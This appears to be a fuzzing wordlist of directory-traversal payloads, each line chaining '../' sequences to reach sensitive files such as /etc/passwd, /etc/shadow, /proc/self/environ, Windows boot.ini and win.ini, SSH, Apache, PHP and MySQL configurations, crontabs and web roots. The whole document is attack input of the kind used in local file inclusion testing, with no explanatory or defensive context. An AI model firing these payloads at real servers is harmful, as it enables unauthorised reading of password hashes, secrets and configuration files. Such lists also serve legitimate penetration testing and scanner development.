../../../../../../../../etc/passwd
../../../../../../../../boot.ini
../../../../../../../../Windows/win.ini
../../../../../../../../../proc/self/environ
../../../../../../../../../etc/shadow
../../../../../../../../../etc/issue
../../../../../../../../../etc/group
../../../../../../../../../etc/hosts
../../../../../../../../../etc/services
../../../../../../../../../etc/aliases
../../../../../../../../../etc/apache2/apache2.conf
../../../../../../../../../etc/apache2/httpd.conf
../../../../../../../../../etc/apache2/access.conf
../../../../../../../../../etc/apache2/envvars
../../../../../../../../../etc/apache2/magic
../../../../../../../../../etc/apache2/mime.types
../../../../../../../../../etc/apache2/ports.conf
../../../../../../../../../etc/apache2/sites-available/default
../../../../../../../../../etc/apache2/sites-enabled/000-default
../../../../../../../../../etc/apache2/sites-enabled/default-ssl
../../../../../../../../../etc/apache2/ssl
../../../../../../../../../etc/apache2/conf.d/
../../../../../../../../../etc/my.cnf
../../../../../../../../../etc/php.ini
../../../../../../../../../etc/ssh/sshd_config
../../../../../../../../../etc/init.d/
../../../../../../../../../etc/network/interfaces
../../../../../../../../../etc/network/if-up.d
../../../../../../../../../etc/network/if-down.d
../../../../../../../../../etc/samba/smb.conf
../../../../../../../../../etc/crontab
../../../../../../../../../etc/cron.d/
../../../../../../../../../etc/sysctl.conf
../../../../../../../../../etc/apache2/sites-available/000-default
../../../../../../../../../usr/lib/apache2/modules/mod_access.so
../../../../../../../../../usr/lib/apache2/modules/mod_auth.so
../../../../../../../../../usr/lib/apache2/modules/mod_cgi.so
../../../../../../../../../usr/lib/apache2/modules/mod_deflate.so
../../../../../../../../../usr/lib/apache2/modules/mod_dir.so
../../../../../../../../../usr/lib/apache2/modules/mod_env.so
../../../../../../../../../usr/lib/apache2/modules/mod_expires.so
../../../../../../../../../usr/lib/apache2/modules/mod_headers.so
../../../../../../../../../usr/lib/apache2/modules/mod_include.so
../../../../../../../../../usr/lib/apache2/modules/mod_log_config.so
../../../../../../../../../usr/lib/apache2/modules/mod_mime.so
../../../../../../../../../usr/lib/apache2/modules/mod_negotiation.so
../../../../../../../../../usr/lib/apache2/modules/mod_proxy.so
../../../../../../../../../usr/lib/apache2/modules/mod_rewrite.so
../../../../../../../../../usr/lib/apache2/modules/mod_setenvif.so
../../../../../../../../../usr/lib/apache2/modules/mod_ssl.so
../../../../../../../../../usr/lib/apache2/modules/mod_status.so
../../../../../../../../../usr/lib/apache2/modules/mod_userdir.so
../../../../../../../../../usr/lib/apache2/modules/mod_alias.so
../../../../../../../../../usr/lib/apache2/modules/mod_auth_basic.so
../../../../../../../../../usr/lib/apache2/modules/mod_authn_file.so
../../../../../../../../../usr/lib/apache2/modules/mod_authz_default.so
../../../../../../../../../usr/lib/apache2/modules/mod_authz_groupfile.so
../../../../../../../../../usr/lib/apache2/modules/mod_authz_host.so
../../../../../../../../../usr/lib/apache2/modules/mod_authz_user.so
../../../../../../../../../usr/lib/apache2/modules/mod_autoindex.so
../../../../../../../../../usr/lib/apache2/modules/mod_dav_fs.so
../../../../../../../../../usr/lib/apache2/modules/mod_dav.so
../../../../../../../../../usr/lib/apache2/modules/mod_status.so
../../../../../../../../../usr/lib/apache2/modules/mod_unique_id.so
../../../../../../../../../usr/lib/apache2/modules/libphp5.so
../../../../../../../../../usr/local/bin/
../../../../../../../../../usr/local/lib/
../../../../../../../../../usr/local/etc/
../../../../../../../../../usr/local/sbin/
../../../../../../../../../usr/local/share/
../../../../../../../../../usr/local/var/
../../../../../../../../../var/spool/cron/crontabs
../../../../../../../../../opt/lampp/etc/php.ini
../../../../../../../../../opt/lampp/etc/my.cnf
../../../../../../../../../opt/lampp/etc/httpd.conf
../../../../../../../../../opt/lampp/etc/extra/httpd-vhosts.conf
../../../../../../../../../var/www/vhosts/
../../../../../../../../../var/www/html/
../../../../../../../../../var/www/cgi-bin/
../../../../../../../../../var/www/htdocs/
../../../../../../../../../var/www/conf/httpd.conf
../../../../../../../../../var/www/conf/vhosts/
../../../../../../../../../etc/httpd/conf/httpd.conf
../../../../../../../../../etc/httpd/conf/extra/httpd-vhosts.conf
../../../../../../../../../etc/httpd/conf.d/
../../../../../../../../../etc/httpd/logs/
../../../../../../../../../etc/httpd/modules/
../../../../../../../../../etc/httpd/users/
../../../../../../../../../etc/httpd/vhosts/
../../../../../../../../../etc/httpd/ssl/
../../../../../../../../../etc/php5/apache2/php.ini
../../../../../../../../../etc/php5/cli/php.ini
../../../../../../../../../etc/apache2/mods-available/
../../../../../../../../../etc/apache2/mods-enabled/
../../../../../../../../../etc/apache2/sites-available/
../../../../../../../../../etc/apache2/sites-enabled/
../../../../../../../../../etc/php5/apache2/conf.d/
../../../../../../../../../etc/php5/conf.d/
../../../../../../../../../etc/php5/cli/conf.d/
../../../../../../../../../etc/php5/cgi/conf.d/
